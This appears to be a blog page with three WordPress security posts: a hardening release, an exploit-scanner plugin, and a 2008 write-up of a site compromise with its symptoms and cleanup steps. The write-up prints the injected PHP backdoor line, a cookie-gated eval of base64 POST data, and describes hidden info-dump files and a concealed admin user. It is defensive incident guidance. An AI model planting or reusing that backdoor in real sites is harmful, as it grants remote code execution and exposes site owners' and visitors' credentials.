WordPress 2.8.5

October 21, 2009 | No Comments Yet

WordPress has come out with yet another security upgrade (they call it a “hardening release”), notably in line with this trackback-related 0-day exploit.

As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.

The WordPress team also recommends users to install the WordPress Exploit Scanner plugin, which you can download here.

Leave a Comment | Tags: , , , , , ,

WordPress Plugin: WordPress Exploit Scanner

June 27, 2008 | No Comments Yet

With all the talk about WordPress security vulnerabilities, every bit of protection helps. The WordPress Exploit Scanner plugin does just what it says: it looks for any suspicious behavior in your WordPress files and database tables.

This WordPress plugin searches the files on your site for a few known strings sometimes used by hackers, and lists them with code fragments taken from the files. It also makes a few checks of the database, looking at the active_plugins blog option, the comments table, and the posts table.

It also allows the blog owner to search for whatever string they like which could come in handy when new exploit code is used in a hack.

Download WordPress Exploit Scanner

Leave a Comment | Tags: , , , , , , ,

Has Your WordPress Been Hacked Recently?

April 16, 2008 | 34 Comments

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters numbers and numbers vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here are the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.

Leave a Comment | Tags: , , , , , , ,